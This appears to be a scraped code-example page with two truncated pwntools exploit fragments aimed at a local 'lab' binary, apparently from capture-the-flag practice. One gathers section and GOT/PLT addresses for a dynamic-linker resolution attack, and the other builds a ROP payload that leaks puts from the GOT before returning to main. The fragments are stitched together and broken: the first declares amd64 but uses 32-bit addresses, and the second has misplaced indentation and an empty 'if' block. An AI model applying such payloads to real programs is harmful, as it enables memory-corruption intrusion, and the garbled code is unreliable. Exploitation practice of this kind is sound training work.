Пример #1
#!/usr/bin/env python3
from pwn import process, ELF, log, context, pause
from fastpwn import pack
context(arch='amd64', os='linux', log_level='DEBUG')
binary = ELF('./lab')
p = binary.process()
offset = 112
#### define sections of the binary
# since PIE is not enabled, these will be static offsets to whichever section we want
# we will not pack them, since after they are in bytes we cannot use as decimal offsets :(
bss = 0x0804c028
plt = 0x08049030
rel_plt = 0x08048424
dynsym = 0x08048260
dynstr = 0x08048320
#### Important entries within PLT/GOT
got_read = 0x0804c010
plt_read = 0x08049050
log.info(".bss: \t%s" % hex(bss))
log.info(".plt: \t%s" % hex(plt))
log.info(".rel.plt: %s" % hex(rel_plt))
log.info(".dynsym:  %s" % hex(dynsym))
log.info(".dynstr:  %s" % hex(dynstr))
log.info("GOT entry to read: %s" % hex(got_read))
log.info("PLT entry to read: %s" % hex(plt_read))

stack = 0x300
Пример #2
#!/usr/bin/env python3
from pwn import ELF, process, context, log
from fastpwn import pack, aslr  # custom library :)
from sys import argv, exit
    if len(argv) > 1 and argv[1] == "-l":
        if aslr.read():
        context(arch='amd64', os='linux', log_level='DEBUG')  # binary context
        binary = ELF("./lab")  # define our binary
        p = binary.process(env={'LD_PRELOAD': './libc.so.6'
                                })  # start our process and define enviroment

        libc = binary.libc  # name our libc object
        # we can statically find the addresses of the PLT and GOT within the binary
        # just in case you were too lazy to, here is the pwntools way to do it
        # plt_puts=binary.plt['puts']
        # got_puts=binary.got['puts']
        # main_addr=binary.sym['main']

        pop_rdi = pack.pk64(0x00000000004011e3)
        got_puts = pack.pk64(0x00404018)
        plt_puts = pack.pk64(0x00401030)
        main_addr = pack.pk64(0x00401136)
        offset = 40
        leak_payload = b"A" * offset  # overwrite ret addr, main ret back to gadget
        leak_payload += pop_rdi  # next we use a gadget, rdi will be the first parameter
        leak_payload += got_puts  # pass the address of the puts() entry on the global offset table
        leak_payload += plt_puts  # then, call puts(), this will actuall call puts
        leak_payload += main_addr  # ret back to main, since we still want to overwrite the buffer again